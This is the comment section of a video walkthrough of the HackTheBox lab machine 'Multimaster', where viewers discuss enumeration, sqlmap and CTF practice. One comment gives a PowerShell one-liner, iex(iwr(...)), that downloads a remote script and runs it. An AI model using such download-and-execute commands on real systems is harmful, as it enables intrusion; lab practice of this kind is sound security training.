HackTheBox - Multimaster

Поділитися
Вставка
  • Опубліковано 2 січ 2025

КОМЕНТАРІ • 28

  • @dayisnow
    @dayisnow 4 роки тому +8

    I rooted this box in the first 25 roots, so the RID brute forcing was actually bypassable with a user that could be enumerated with crackmapexec. It was patched later on, but it was cool to see the stuff I missed out on during the process :) Thanks for the video as always!

  • @abdosama
    @abdosama 4 роки тому

    Always enjoying watching and learning, thanks :)

  • @ianmusyoka9717
    @ianmusyoka9717 4 роки тому +3

    Sweet can't wait to see how you did the box

  • @constroyanonymous7830
    @constroyanonymous7830 4 роки тому +1

    Hey Ippsec a quick out of the context question does Jeopardy CTF's help in developing skills to solve boot2root CTF's

  • @aaronbreeden6898
    @aaronbreeden6898 4 роки тому +1

    Was wondering if any boxes would be affected by that exploit. Looks like at least one is.

  • @matheusBBarni
    @matheusBBarni 4 роки тому +1

    What SO you are using ? And If It Kali, you are using on a virtual box ?

    • @booooman
      @booooman 4 роки тому +2

      He's using Parrot with VMware Workstation afaik

  • @puppe1977
    @puppe1977 4 роки тому +1

    I prefer r.json() instead of json.loads(r.text), where r is return value from requests.post(...)

  • @ohmyavax
    @ohmyavax 2 роки тому

    why are you never using sqlmaps --os-shell or --os-pwn arguments?

    • @ippsec
      @ippsec  2 роки тому

      I just don’t like them they will rarely work and I rather have more control when touching disk

  • @pramodkhandelwal9321
    @pramodkhandelwal9321 4 роки тому +1

    Brilliant video keep it up....

  • @mehmetux4186
    @mehmetux4186 4 роки тому

    Using proxy when sending data and looking visualization in burp. Thats why i need . So i can solve sending data problem quicly. thank you very much bro.

  • @myhackingblog3692
    @myhackingblog3692 2 роки тому

    Thank you for the walk through. At 11 minutes if you provided an empty string you would have had 17 users returned, you missed egre55 😉.

  • @cyb3rboy1986
    @cyb3rboy1986 4 роки тому +1

    One of the best boxes

  • @bva1092
    @bva1092 4 роки тому

    Thanks :D

  • @utku_yucel
    @utku_yucel 4 роки тому

    Thanks.

  • @jezielsuzana8643
    @jezielsuzana8643 4 роки тому

    nice

  • @goliadking
    @goliadking Рік тому

    1:52:03 lmao

  • @pswalia2u
    @pswalia2u 4 роки тому

    netstat -oa | findstr 127.0.0.1 . -o shows process id

  • @kbto
    @kbto Рік тому

    You don’t need to use any quotations for downloading and executing scripts, you can just do iex(iwr(server/script.ps1)) to avoid using base64